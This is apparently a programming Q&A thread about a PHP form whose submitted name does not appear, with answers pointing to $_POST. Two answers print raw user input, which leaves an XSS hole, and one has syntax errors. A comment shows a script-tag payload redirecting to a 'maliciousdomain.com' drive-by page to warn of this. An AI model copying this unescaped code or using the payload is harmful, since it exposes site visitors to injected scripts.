# PHP is not passing my user entries

Tags: php

Hi I'm learning php of a tutorial and these are my two files. I browse to my apache2 server via `http://myservers-ip/form2.php`
fill out the forms and hit the submit button, it calls my result.php page, but all it displays is "Hi ." where it should be like "Hi (userentry)."
Please help :-(

form2.php:

```
<html>
        <head>
        <title>Form</title>
        </head>
        <body>

        <h1>Enter your name</h1>

        <form method="post" action="result.php">
        <input type="text" name="username">
        <input type="submit">
        </form>

        </body>
</html>
```

and my result.php

```
Hi <?php print $username; ?>.
```

Using apache2 and mysql running on my box.
I'm not sure if the source code is correct or if there might be a misconfiguration? if so  which config files would you need?

Thanks

Comment: print $_POST['username']

Comment: take a look at this instead of your decade outdated tutorial http://www.phptherightway.com/

Comment: That tutorial likely assumes `register_globals` directive turned on, which is an awful thing gladly turned off by default eons ago. Trash that tutorial at once

Comment: @Xerkus That site is really not aimed at people trying to write "hello world"

Answer (score 0):

Data sent via a form with POST action will be in the superglobal `$_POST` array. You would want to sanitize it before trying to use it for anything, but just starting with `$_POST['username']` will get you closer to your end goal.

Edit: Whatever tutorial you are using, abandon it. It's clearly waaaaay outdated.

Comment: Wow, 3 answers in such a short time!!

Thanks guys, I really appreciate it that you took the time :-)

Awesome!! Made my day :-)

Thanks again!!!!!!!

Answer (score 0):

You're sending data from form via post so you need to get them in your result.php file from POST superglobal like so:

```
Hi <?php print $_POST['username']; ?>.
```

Comment: My username is `<script>window.location = 'http://maliciousdomain.com/driveby';</script>`

Answer (score 0):

The data is being sent to results.php via POST method.
All post params are stored in `$_POST` param. So to get user name you need to get it from `$_POST`, in results.php. E.g:

```
<?php 
// file: results.php

if (isset($_POST['username']){
 echo "Hi, {$_POST['username']}.";
} else {
  echo "No user name."
}
```